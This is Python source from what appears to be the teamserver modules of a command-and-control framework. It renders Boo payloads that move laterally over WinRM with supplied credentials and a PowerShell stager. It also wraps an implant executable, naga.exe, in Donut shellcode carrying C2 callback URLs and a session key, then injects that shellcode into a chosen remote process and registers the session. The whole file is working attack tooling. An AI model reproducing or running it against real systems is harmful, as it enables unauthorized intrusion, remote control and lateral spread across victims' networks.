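def payload(self):
    """Render the WinRM lateral-movement Boo source for the selected listener.

    Fetches the PowerShell stager and the listener named by the 'Listener'
    option over IPC, generates a stage for that listener, fills the
    placeholders in core/teamserver/modules/boo/src/winrm.boo from the module
    options, and registers the new session's (guid, psk) with the teamserver.

    Returns:
        The rendered Boo source, or None (after printing an error) when the
        stager or the listener could not be resolved.
    """
    import re  # function-scope so the file's import block stays untouched

    listener_name = self.options['Listener']['Value']
    stager = ipc_server.publish_event(events.GET_STAGERS, ('powershell', ))
    listener = ipc_server.publish_event(events.GET_LISTENERS, (listener_name, ))

    # Report the piece that is actually missing instead of blaming the
    # listener for both cases.
    if not stager:
        print_bad('PowerShell stager not found')
        return None
    if not listener:
        print_bad(f"Listener '{listener_name}' not found!")
        return None

    stager.options['AsFunction']['Value'] = False
    guid, psk, stage = stager.generate(listener)

    with open('core/teamserver/modules/boo/src/winrm.boo', 'r') as module_src:
        template = module_src.read()

    # Placeholder -> value. Credentials are spliced into the Boo source
    # verbatim: a value containing the template's string delimiter would
    # break or alter the generated code (template quoting is not visible
    # here). The stage is wrapped in backticks as before; presumably the
    # template expects that form.
    values = {
        'TARGET': self.options['Host']['Value'],
        'USERNAME': self.options['Username']['Value'],
        'DOMAIN': self.options['Domain']['Value'],
        'PASSWORD': self.options['Password']['Value'],
        'TRUSTED_HOSTS': str(self.options['AddToTrustedHosts']['Value']).lower(),
        'PAYLOAD': f'`{stage}`',
    }
    # Single pass: chained str.replace re-scans already-substituted text, so
    # a value containing a later placeholder name (e.g. a password containing
    # "PAYLOAD") would itself be rewritten. A callable replacement also keeps
    # backslashes in the values literal.
    placeholder = re.compile('|'.join(map(re.escape, values)))
    src = placeholder.sub(lambda m: values[m.group(0)], template)

    # Register only once the payload rendered, so a failure above (missing
    # template, unset option) does not leave an orphaned session behind.
    ipc_server.publish_event(events.SESSION_REGISTER, (guid, psk))
    return src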
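def payload(self):
    """Render the remote-injection Boo source carrying a naga.exe implant.

    Resolves the listener named by the 'Listener' option over IPC, builds the
    C2 URL list, generates a fresh session guid/PSK, wraps naga.exe in Donut
    shellcode with those as its parameters, splices the shellcode and the
    target process name into core/teamserver/modules/boo/src/injectremote.boo,
    and registers the session with the teamserver.

    Returns:
        The rendered Boo source, or None (after printing an error) when the
        listener could not be resolved.
    """
    listener_name = self.options['Listener']['Value']
    listener = ipc_server.publish_event(events.GET_LISTENERS, (listener_name, ))
    if not listener:
        print_bad(f"Listener '{listener_name}' not found!")
        return None

    # Primary C2 endpoint first, then any extra callback URLs; filter(None)
    # drops an empty/None CallBackURls entry.
    c2_urls = ','.join(filter(None, [
        f"{listener.name}://{listener['BindIP']}:{listener['Port']}",
        listener['CallBackURls'],
    ]))

    guid = uuid.uuid4()
    psk = gen_stager_psk()

    # arch 2 is selected for 'x64', 1 for anything else (presumably Donut's
    # amd64 / x86 codes). The PSK is baked into the shellcode parameters, so
    # the generated payload is itself sensitive material.
    donut_shellcode = donut.create(
        file='./core/teamserver/data/naga.exe',
        params=f"{guid};{psk};{c2_urls}",
        arch=2 if self.options['Architecture']['Value'] == 'x64' else 1)
    shellcode = shellcode_to_int_byte_array(donut_shellcode)

    # NOTE: only the InjectRemote technique is wired up here; the
    # InjectionMethod option (a commented-out check in the original) is not
    # consulted.
    with open('core/teamserver/modules/boo/src/injectremote.boo', 'r') as module_src:
        src = module_src.read()
    src = src.replace('BYTES', shellcode)
    src = src.replace('PROCESS', self.options['Process']['Value'])

    # Register only once the payload rendered, so a Donut or template failure
    # does not leave an orphaned session on the teamserver.
    ipc_server.publish_event(events.SESSION_REGISTER, (guid, psk))
    return src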
def run(self, guids):
    """Queue this module as a new job for every session guid in ``guids``.

    A separate Job built from ``self.selected`` is created per guid and
    handed to the teamserver through the NEW_JOB IPC event.
    """
    for session_guid in guids:
        job = Job(module=self.selected)
        ipc_server.publish_event(events.NEW_JOB, (session_guid, job))